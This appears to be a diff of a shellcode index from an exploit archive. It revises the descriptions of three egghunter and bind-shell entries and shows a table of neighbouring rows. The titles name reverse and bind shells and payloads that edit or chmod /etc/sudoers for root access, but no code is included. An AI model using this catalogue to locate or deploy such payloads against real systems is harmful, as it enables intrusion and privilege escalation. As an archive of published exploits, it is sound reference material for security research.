@ -888,6 +888,6 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - EggHunter + access() Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm

1 id file description date author type platform
872 42992 shellcodes/windows_x86-64/42992.c Windows/x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
873 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86
874 44321 shellcodes/linux_x86/44321.c Linux/x86 - execve(/bin/sh) Shellcode (18 bytes) 2018-03-20 Anurag Srivastava shellcode linux_x86
875 44334 shellcodes/linux_x86/44334.c Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes) Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes) 2018-03-23 Anurag Srivastava shellcode linux_x86
876 44445 shellcodes/generator/44445.py Linux/x64 - x64 Assembly Shellcode (Generator) 2018-04-11 0x4ndr3 shellcode generator
877 44505 shellcodes/linux_x86/44505.c Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes) 2018-04-24 Anurag Srivastava shellcode linux_x86
878 44507 shellcodes/linux_x86/44507.c Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes) 2018-04-24 absolomb shellcode linux_x86
888 44738 shellcodes/linux_x86/44738.c Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes) 2018-05-24 Nuno Freitas shellcode linux_x86
889 44740 shellcodes/linux_x86/44740.c Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes) 2018-05-24 Jonathan Crosby shellcode linux_x86
890 44791 shellcodes/linux_x86/44791.c Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes) 2018-05-28 Luca shellcode linux_x86
891 44807 shellcodes/linux_x86/44807.c Linux/x86 - EggHunter + access() Shellcode (38 bytes) Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
892 44808 shellcodes/linux_x86/44808.c Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes) Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes) 2018-05-31 Paolo Perego shellcode linux_x86
893 44811 shellcodes/arm/44811.c Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes) Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes) 2018-05-31 Ken Kitahara shellcode arm